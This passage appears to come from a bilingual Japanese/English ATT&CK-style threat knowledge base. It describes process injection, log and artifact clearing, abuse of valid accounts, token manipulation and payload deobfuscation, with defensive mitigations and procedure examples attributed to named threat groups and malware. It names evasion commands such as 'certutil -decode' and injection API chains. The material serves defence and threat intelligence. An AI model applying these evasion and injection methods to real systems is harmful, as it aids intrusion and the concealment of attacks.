in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、VDSOハイジャックでコードを注入することがある。Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、ListPlantingを悪用してコードを注入することがある。Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 プロセスインジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word. During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original. During the 2015 Ukraine Electric Power Attack, Sandworm Team loaded BlackEnergy into svchost.exe, which then launched iexplore.exe for their C2. During Cutting Edge, threat actors used malicious SparkGateway plugins to inject shared objects into web process memory on compromised Ivanti Secure Connect VPNs to enable deployment of backdoors. ArcaneDoor included injecting code into the AAA and Crash Dump processes on infected Cisco ASA devices. During RedPenguin, UNC3886 exploited CVE-2025-21590 to enable malicious code injection into the memory of legitimate processes. During the 3CX Supply Chain Attack, AppleJeus's VEILEDSIGNAL uses process injection to inject the C2 communication module code in the first found process instance of Chrome, Firefox, or Edge web browsers. It also monitors the established named pipe and re-injects the C2 communication module if necessary. Turla has also used PowerSploit's <code>Invoke-ReflectivePEInjection.ps1</code> to reflectively load a PowerShell payload into a random process on the victim system. Gamaredon Group has injected Remcos into explorer.exe. APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe. APT37 injects its malware variant, ROKRAT, into the cmd.exe process. PLATINUM has used various methods of process injection including hot patching. Cobalt Group has injected code into trusted processes. APT38 has injected malicious payloads into the `explorer.exe` process. Silence has injected a DLL library containing a Trojan into the fwmain32.exe process. Kimsuky has used Win7Elevate to inject malicious code into explorer.exe. APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process. Wizard Spider has used process injection to execute payloads to escalate privileges. TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe. APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to alter its functionality. BlackByte has injected Cobalt Strike into `wuauclt.exe` during intrusions. BlackByte has injected ransomware into `svchost.exe` before encryption. Velvet Ant initial execution included launching multiple `svchost` processes and injecting code into them. Dyre has the ability to directly inject its code into the web browser process. gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function. HTRAN can inject into into running processes. JHUHUGIT performs code injection injecting its own functions to browser processes. Mis-Type has been injected directly into a running process, including `explorer.exe`. Backdoor.Oldrea injects itself into explorer.exe. Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary. Gazer injects its communication module into an Internet accessible process through which it performs C2. Wingbird performs multiple process injections to hijack system processes and execute malicious code. NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe. JPIN can inject content into lsass.exe to load a module. Wiarp creates a backdoor through which remote attackers can inject files into running processes. Smoke Loader injects into the Internet Explorer process. ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`. NavRAT copies itself into a running Internet Explorer process to evade detection. InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure. TrickBot has used <code>Nt*</code> Native API functions to inject code into legitimate processes such as <code>wermgr.exe</code>. Agent Tesla can inject into known, vulnerable binaries on targeted hosts. Remcos has a command to hide itself by injecting into another process. AuditCred can inject code from files to other running processes. Cardinal RAT injects into a newly spawned process created from a native Windows executable. Empire contains multiple modules for injecting into processes, such as <code>Invoke-PSInject</code>. HOPLIGHT has injected into running processes. PoshC2 contains multiple modules for injecting into processes, such as <code>Invoke-PSInject</code>. StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser. HyperBro can run shellcode it injects into a newly created process. TSCookie has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes. Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection. Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>. ABK has the ability to inject shellcode into svchost.exe. BBK has the ability to inject shellcode into svchost.exe. Avenger has the ability to inject shellcode into svchost.exe. REvil can inject itself into running processes on a compromised host. SLOTHFULMEDIA can inject into running processes on a compromised host. Bazar can inject code through calling <code>VirtualAllocExNuma</code>. Egregor can inject its payload into iexplore.exe process. GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process. Waterbear can inject decrypted shellcode into the LanmanServer service. IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process. ShadowPad has injected an install module into a newly created process. CostaBricks can inject a payload into the memory of a compromised host. Sliver includes multiple methods to perform process injection to migrate the framework into other, potentially privileged processes on the victim machine. QakBot can inject itself into processes including explore.exe, Iexplore.exe, Mobsync.exe., and wermgr.exe. Clambling can inject into the `svchost.exe` process for execution. Pandora can start and inject code into a new `svchost` process. WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation. Lizar can migrate the loader into another process. SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process. Donut includes a subproject <code>DonutTest</code> to inject shellcode into a target process. Bumblebee can inject code into multiple processes on infected endpoints. The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes. metaMain can inject the loader file, Speech02.db, into a process. Woody RAT can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread. ANDROMEDA can inject into the `wuauclt.exe` process to perform C2 actions. BADHATCH can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`. Ninja has the ability to inject an agent module into a new process and arbitrary shellcode into running processes. COATHANGER includes a binary labeled `authd` that can inject a library into a running process and then hook an existing function within that process with a new function from that library. Mispadu's binary is injected into memory via `WriteProcessMemory`. DUSTTRAP compromises the `.text` section of a legitimate system DLL in `%windir%` to hold the contents of retrieved plug-ins. BlackByte 2.0 Ransomware injects into a newly-created `svchost.exe` process prior to device encryption. PureCrypter can inject its final stage into another process on the targeted system. LODEINFO can inject shellcode into the memory of compromised hosts. DOWNIISSA can inject shellcode directly into process memory including WINWORD.exe and msiexec.exe. HiddenFace can inject code directly into legitimate applications. NOOPLDR can inject decrypted payloads into processes including wuauclt.exe., rdrleakdiag.exe, and tabcal.exe. 敵対者は、ログやファイル等の痕跡を除去して検知を回避することがある。 Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior. 敵対者は、コマンド履歴を消去して痕跡を残さないようにすることがある。In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 敵対者は、ファイルを削除して痕跡を消すことがある。Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. 敵対者は、ネットワーク共有接続を削除して痕跡を消すことがある。Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and SMB/Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. 敵対者は、ファイルのタイムスタンプを改ざん（タイムストンプ）して痕跡を隠すことがある。Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files. 敵対者は、ネットワーク接続の履歴や構成を消去して痕跡を消すことがある。Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries. 敵対者は、メールボックスのデータを消去して痕跡を消すことがある。Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. 敵対者は、設定した永続化の痕跡を消去することがある。Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, Modify Registry, Plist File Modification, or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence. Adversaries may also delete accounts previously created to maintain persistence (i.e. Create Account). 敵対者は、マルウェアを別の場所へ再配置して検知や追跡を回避することがある。Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with File Deletion to cleanup older artifacts. ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 重要データをリモートに保管し、破壊・改ざんの影響を軽減する。 機微情報を暗号化し、窃取時の影響を軽減する。 痕跡の除去に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file. During Cutting Edge, threat actors cleared logs to remove traces of their activity and restored compromised systems to a clean state to bypass manufacturer mitigations for CVE-2023-46805 and CVE-2024-21887. Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked. Mustang Panda has deleted registry keys that store data and maintained persistence. APT5 has used the THINBLOOD utility to clear SSL VPN log files located at `/home/runtime/logs`. APT42 has cleared Chrome browser history. BlackEnergy has removed the watermark associated with enabling the <code>TESTSIGNING</code> boot configuration option by removing the relevant strings in the <code>user32.dll.mui</code> of the system. Orz can overwrite Registry settings to reduce its visibility on the victim. Bankshot deletes all artifacts associated with the malware from the infected machine. Remcos can clean saved cookies and logins from the web browser. Rising Sun can clear a memory blog in the process by overwriting it with junk bytes. Maze has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection. Metamorfo has a command to delete a Registry key it uses, <code>\Software\Microsoft\Internet Explorer\notes</code>. SDBbot has the ability to clean up and remove data structures from a compromised host. CSPY Downloader has the ability to remove values it writes to the Registry. SUNBURST removed HTTP proxy registry values to clean up traces of execution. EVILNUM has a function called "DeleteLeftovers" to remove certain artifacts of the attack. Sibot will delete an associated registry key if a certain server response is received. ShadowPad has deleted arbitrary Registry values. Stuxnet can delete OLE Automation and SQL stored procedures used to store malicious payloads. DarkWatchman can uninstall malicious components from the Registry, stop processes, and clear the browser history. Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy` Registry key. SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys. Donut can erase file references to payloads in-memory after being reflectively loaded and executed. Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections. HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services. FunnyDream has the ability to clean traces of malware deployment. Sardonic has the ability to delete created WMI objects to evade detections. IPsec Helper can delete various registry keys related to its execution and use. MultiLayer Wiper uses a batch script to clear file system cache memory via the <code>ProcessIdleTasks</code> export in <code>advapi32.dll</code> as an anti-analysis and anti-forensics technique. DUSTTRAP restores the `.text` section of compromised DLLs after malicious code is loaded into memory and before the file is closed. BPFDoor clears the file location `/proc/<PID>/environ` removing all environment variables for the process. IronWind has used a .NET DLL named "exit-DN4-core.dll" to terminate malicious processes running on victim's systems. 敵対者は、有効なアカウントの認証情報を用いて検知を回避しアクセスすることがある。 Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 敵対者は、デフォルトアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes. 敵対者は、ドメインアカウントの認証情報を悪用してアクセスや横展開を行うことがある。Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. 敵対者は、ローカルアカウントの認証情報を悪用してアクセスを行うことがある。Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 敵対者は、クラウドアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 有効なアカウントに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During Operation Wocao, threat actors used valid VPN credentials to gain initial access. During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally. During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. During the C0032 campaign, TEMP.Veles used compromised VPN accounts. During HomeLand Justice, threat actors used a compromised Exchange account to search mailboxes and create new Exchange accounts. During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks. Leviathan used captured, valid account information to log into victim web applications and appliances during Leviathan Australian Intrusions. During RedPenguin, UNC3886 used legitimate credentials to gain priviliged access to Juniper routers. During 3CX Supply Chain Attack, AppleJeus has gained access to the 3CX corporate environment through legitimate VPN credentials. During the Anthropic AI-orchestrated Campaign, the adversary used harvested credentials to authenticate against internal APIs, database systems, container registries, and logging infrastructure across targeted networks. Axiom has used previously compromised administrative accounts to escalate privileges. Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder. Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars. PittyTiger attempts to obtain legitimate credentials during operations. APT29 has used a compromised account to access an organization's VPN infrastructure. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. Lazarus Group has used administrator credentials to gain access to restricted network segments. Sandworm Team have used previously acquired legitimate credentials prior to attacks. Dragonfly has compromised user credentials and used valid accounts for operations. To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes. Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner. menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments. FIN7 has harvested valid administrative credentials for lateral movement. OilRig has used compromised credentials to access other systems on a victim network. FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment. FIN8 has used valid accounts for persistence and lateral movement. APT33 has used valid accounts for initial access and privilege escalation. Leviathan has obtained valid accounts to gain initial access. FIN4 has used legitimate credentials to hijack email communications. APT39 has used stolen credentials to compromise Outlook Web Access (OWA). Silence has used compromised credentials to log on to other systems and escalate privileges. GALLIUM leveraged valid accounts to maintain access to a victim network. APT41 used compromised credentials to log on to other systems. Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers. Chimera has used a valid account to maintain persistence via scheduled task. Fox Kitten has used valid credentials with various services during lateral movement. Indrik Spider has used valid accounts for initial access and lateral movement. Indrik Spider has also maintained access to the victim environment through the VPN infrastructure. Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts. LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs. POLONIUM has used valid compromised credentials to gain access to victim environments. Scattered Spider has used compromised credentials for initial access. Volt Typhoon relies primarily on valid credentials for persistence. Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services. Akira uses valid account information to remotely access victim networks, such as VPN credentials. INC Ransom has used compromised valid accounts for access to victim environments. Star Blizzard has used stolen credentials to sign into victim email accounts. Play has used valid VPN accounts to achieve initial access. Sea Turtle used compromised credentials to maintain long-term access to victim environments. BlackByte has gained access to victim environments through legitimate VPN credentials. UNC3886 has used tools to hijack valid SSH accounts. Medusa Group has utilized compromised legitimate local and domain accounts within the victim environment to facilitate remote access and lateral movement sometimes in combination with PsExec. VOID MANTICORE has leveraged valid accounts to log into VPN infrastructure. VOID MANTICORE has used compromised valid credentials to gain access to management infrastructure and enterprise control systems. VOID MANTICORE has also validated and tested authentication using compromised credentials prior to malicious actions. Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware. Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials. Linux Rabbit acquires valid SSH accounts through brute force. Dtrack used hard-coded credentials to gain access to a network share. Kinsing has used valid SSH credentials to access remote hosts. Industroyer can use supplied user credentials to execute processes and stop services. LP-Notes has used stolen Windows credentials to log in as the users. 敵対者は、署名済みの開発ツールを悪用して悪意あるコードをプロキシ実行することがある。 Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. 敵対者は、MSBuildを悪用して署名済みプロセス経由でコードを実行することがある。Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations. 敵対者は、ClickOnceを悪用してコードを実行することがある。Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility. ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application. 敵対者は、JamPlusを悪用してコードを実行することがある。Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio. 危険なWebコンテンツへのアクセスを制限する。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 信頼された開発ツールによるプロキシ実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、アクセストークンを操作して別ユーザーになりすまし権限昇格することがある。 Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. 敵対者は、トークンを偽装/窃取して別ユーザーになりすますことがある。Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. 敵対者は、窃取したトークンを用いてプロセスを作成することがある。Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>. 敵対者は、トークンを作成・偽装してなりすますことがある。Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. 敵対者は、親PIDをスプーフィングしてプロセスの出自を偽装することがある。Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context. 敵対者は、SID履歴を注入して権限を昇格することがある。Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 アクセストークン操作に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation. Lotus Blossom has retrieved process tokens for processes to adjust the privileges of the launch process or other items. FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges. Blue Mockingbird has used JuicyPotato to abuse the <code>SeImpersonate</code> token privilege to escalate from web application pool accounts to NT Authority\SYSTEM. Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges. SslMM contains a feature to manipulate process privileges and tokens. PowerSploit's <code>Invoke-TokenManipulation</code> Exfiltration module can be used to manipulate tokens. Hydraq creates a backdoor through which remote attackers can adjust token privileges. Empire can use PowerSploit's <code>Invoke-TokenManipulation</code> to manipulate access tokens. PoshC2 can use Invoke-TokenManipulation for manipulating tokens. Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>. SUNSPOT modified its security token to grants itself debugging privileges by adding <code>SeDebugPrivilege</code>. MegaCortex can enable <code>SeDebugPrivilege</code> and adjust token privileges. KillDisk has attempted to get the access token of a process by calling <code>OpenProcessToken</code>. If KillDisk gets the access token, then it attempt to modify the token privileges with <code>AdjustTokenPrivileges</code>. AppleSeed can gain system level privilege by passing <code>SeDebugPrivilege</code> to the <code>AdjustTokenPrivilege</code> API. Cuba has used <code>SeDebugPrivilege</code> and <code>AdjustTokenPrivileges</code> to elevate privileges. Sliver has the ability to manipulate user tokens on targeted Windows systems. Gelsemium can use token manipulation to bypass UAC on Windows7 systems. HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`. Mafalda can use `AdjustTokenPrivileges()` to elevate privileges. BlackCat has the ability modify access tokens. Sagerunex finds the `explorer.exe` process after execution and uses it to change the token of its executing thread. Qilin can use an embedded Mimikatz module for token manipulation. 敵対者は、難読化/エンコードされたファイルや情報を実行時にデコードすることがある。 Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. ファイル/情報の難読化解除・デコードに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload. For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads. During Operation Honeybee, malicious files were decoded prior to execution. During Operation Dust Storm, attackers used VBS code to decode payloads. During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads. During C0021, the threat actors deobfuscated encoded PowerShell commands including use of the specific string `'FromBase'+0x40+'String'`, in place of `FromBase64String` which is normally used to decode base64. During the SolarWinds Compromise, APT29 used 7-Zip to decode their Raindrop malware. Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot. During Juicy Mix, OilRig used a script to concatenate and deobfuscate encoded strings in Mango. ArcaneDoor involved the use of Base64 obfuscated scripts and commands. During APT28 Nearest Neighbor Campaign, APT28 unarchived data using the GUI version of WinRAR. During RedPenguin, UNC3886 used malware implants to deobfuscate incoming C2 messages and encoded archives. During SharePoint ToolShell Exploitation, threat actors decrypted scripts prior to execution. During the 2025 Poland Wiper Attacks, the adversaries decoded a Base64-encoded ZIP archive using the built-in certutil. Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them. An APT28 macro uses the command <code>certutil -decode</code> to decode contents of a .txt file storing the base64 encoded payload. Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads. Darkhotel has decrypted strings and imports using RC4 during execution. Molerats decompresses ZIP files once on the victim machine. During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression. Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime. Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip. menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used <code>certutil -decode</code> to decode files on the victim’s machine when dropping UPPERCUT. FIN7 has decoded a malicious PowerShell script using `certutil -decode hex` and has decoded an XOR-obfuscated block of data with the key `qawsed1q2w3e`, which led to the installation of Lizar. Gamaredon Group tools decrypted additional payloads from the C2. Gamaredon Group has also decoded Base64-encoded source code of a downloader. Additionally, Gamaredon Group has decoded Telegram content to reveal the IP address for C2 communications. A OilRig macro has run a PowerShell command to decode file contents. OilRig has also used certutil to decode base64-encoded files on victims. BRONZE BUTLER downloads encoded payloads and decodes them on the victim. Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors. MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript. An APT19 HTTP malware variant decrypts strings using single-byte XOR keys. Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file. Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload. APT38 has used the RC4 algorithm to decrypt configuration data. APT39 has used malware to decrypt encrypted CAB files. WIRTE has used Base64 to decode malicious VBS script. TA505 has decrypted packed DLLs with an XOR key. Kimsuky has decoded malicious VBScripts using Base64. Kimsuky has also decoded malicious PowerShell scripts using Base64. Kimsuky has decoded RC4 obfuscated files prior to downloading files from their infrastructure. Rocke has extracted tar.gz files after downloading them from a C2 server. Higaisa used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data. ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code. Mustang Panda has the ability to decrypt its payload prior to execution. Mustang Panda has also utilized RC4 encryption for malicious payloads. TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope. Earth Lusca has used certutil to decode a string into a cabinet file. FIN13 has utilized `certutil` to decode base64 encoded versions of custom malware. Volt Typhoon has used Base64-encoded data to transfer payloads and commands, including deobfuscation via certutil. Cinnamon Tempest has used weaponized DLLs to load and decrypt payloads. Malteiro has the ability to deobfuscate downloaded files prior to execution. Agrius has deployed base64-encoded variants of ASPXSpy to evade detection. Winter Vivern delivered exploit payloads via base64-encoded payloads in malicious email messages. Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis. BlackByte has encoded commands in base64-encoded sections concatenated together in PowerShell. BlackByte uses PowerShell commands to disable Windows Defender. Storm-1811 has distributed password-protected archives such as ZIP files during intrusions. Taidoor can use a stream cipher to decrypt stings used by the malware. PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer. PlugX has also decrypted its payloads in 